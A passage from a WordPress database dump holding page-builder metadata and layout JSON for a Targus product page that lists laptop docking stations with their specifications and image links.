tent_score','60'),(8827,3686,'swift-performance','a:0:{}'),(8828,3686,'_hide_page_title',''),(8829,3686,'_hide_header',''),(8830,3686,'_hide_footer',''),(8831,3686,'_hide_breadcrumb',''),(8832,3686,'_cover',''),(8833,3686,'_show_excerpt',''),(8834,3686,'_wc_apply_product',''),(8835,3686,'_yoast_wpseo_content_score','30'),(8836,3686,'_elementor_edit_mode','builder'),(8837,3686,'_elementor_template_type','wp-page'),(8838,3686,'_elementor_version','2.7.4'),(8839,3688,'_wp_attached_file','2019/10/Targus.png'),(8840,3688,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2134;s:6:\"height\";i:1419;s:4:\"file\";s:18:\"2019/10/Targus.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Targus-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Targus-300x199.png\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"Targus-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"Targus-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"Targus-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"Targus-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"Targus-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"Targus-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8841,3688,'_wp_attachment_image_alt',''),(8850,1445,'_elementor_css','a:5:{s:4:\"time\";i:1572510186;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8853,3686,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton 